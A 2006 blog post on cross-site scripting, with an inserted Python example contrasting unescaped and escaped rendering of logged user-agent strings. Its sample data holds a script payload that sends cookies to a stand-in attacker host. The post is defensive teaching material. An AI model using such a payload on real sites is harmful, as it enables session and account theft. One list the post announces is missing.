Website Security

Wednesday, August 16, 2006 by darco

I've learned quite a bit over the past year or so that I've been developing darcness, but one lesson stands out above all others: It is just staggering how many ways there are to compromise the security of a dynamic website.

Making a website secure is a surprisingly non-trivial task that requires plenty of thought and discipline. What makes it worse is that it is all too easy to create gaping security holes without realizing it.

For example, if there is any way for someone to get unsanitized HTML displayed on a page of your site, then you are hosed. Why? That unsanitized HTML can carry a JavaScript program. When you view that page while logged in, the script runs in your browser, in your site's origin, with your session: it can read your cookies, send requests as you, and change anything your account is allowed to change. This is a Cross-Site Scripting (XSS) attack. Like I said, at that point you are hosed.

But this isn't that difficult to prevent, right? Well, in theory, yes. All you have to do is make sure that every string you did not write yourself is converted to HTML entities (or sanitized in some other way, like with kses) at the point where it is written into the page. The catch is the word "every": escaping has to happen on output, it has to match the context the string lands in (page body, attribute value, script), and a single forgotten spot is enough to undo all the rest.

There are, of course, all of the obvious places you want to sanitize, such as search queries, user comments, and user account info. But there are plenty of non-obvious spots where unsanitized HTML can reach a page, because anything the client sends, including the HTTP request headers, is under the client's control.

That happened today when I was browsing through the user agents of people who had visited my site. As I was browsing, I noticed something different: a link. A clickable link. Right there in the agent list. Someone had put HTML in their user-agent string!

In this case, it was simply some user-agent spam (::shiver::), but that harmless <a> tag could just as easily have been a <script> tag. Yikes!
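To make the escaping point and the user-agent story concrete, here is an added example (not code from the original post or from darcness): a page that lists logged User-Agent headers, rendered once the vulnerable way and once with HTML-entity escaping on output, plus an attribute-context variant. The logged headers, including the spam link and a cookie-stealing script, are constructed for the example.

```python
import html

# Constructed sample: User-Agent headers as a site might have logged them.
# The last two are the kind of thing the post describes: the client chose
# to put markup in a header the site later displays.
LOGGED_USER_AGENTS = [
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) "
    "Gecko/20060728 Firefox/1.5.0.6",
    "Googlebot/2.1 (+http://www.google.com/bot.html)",
    '<a href="http://example.invalid/">cheap stuff</a>',
    "<script>document.location='http://attacker.invalid/?c='"
    "+document.cookie</script>",
]


def render_agents_vulnerable(agents):
    """The bug: raw header values are concatenated straight into the page,
    so whoever sent the request decides what markup the page contains."""
    items = "".join(f"  <li>{ua}</li>\n" for ua in agents)
    return "<ul>\n" + items + "</ul>"


def render_agents_escaped(agents):
    """The fix: escape at the moment of output. html.escape turns & < > " '
    into entities, so a header can only ever render as visible text."""
    items = "".join(f"  <li>{html.escape(ua)}</li>\n" for ua in agents)
    return "<ul>\n" + items + "</ul>"


def render_agent_title_attr(ua):
    """Attribute context. The same escaping applies, but here the quote
    characters matter most: without quote=True a value containing '"'
    could close the attribute and start a new one (e.g. an event handler)."""
    return f'<span title="{html.escape(ua, quote=True)}">UA</span>'


def markup_survives(rendered, injected):
    """Check helper: did the injected markup reach the page verbatim?"""
    return injected in rendered


if __name__ == "__main__":
    script = LOGGED_USER_AGENTS[-1]
    print("vulnerable page keeps the <script>:",
          markup_survives(render_agents_vulnerable(LOGGED_USER_AGENTS), script))
    print("escaped page keeps the <script>:",
          markup_survives(render_agents_escaped(LOGGED_USER_AGENTS), script))
    print(render_agents_escaped(LOGGED_USER_AGENTS))
```

Note that `html.escape` is the right tool only for text and quoted attribute values; a value placed inside an inline script or a URL needs escaping rules for that context, which is exactly why "sanitize everything" is easier said than done.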

But that's just the tip of the iceberg. Responsible web developers must also keep in mind:

To be perfectly honest, I don't think most developers of dynamic web applications are knowledgeable about these sorts of attacks, which is rather scary.

What's the moral of this story? If you are a web developer, be paranoid. Very paranoid.
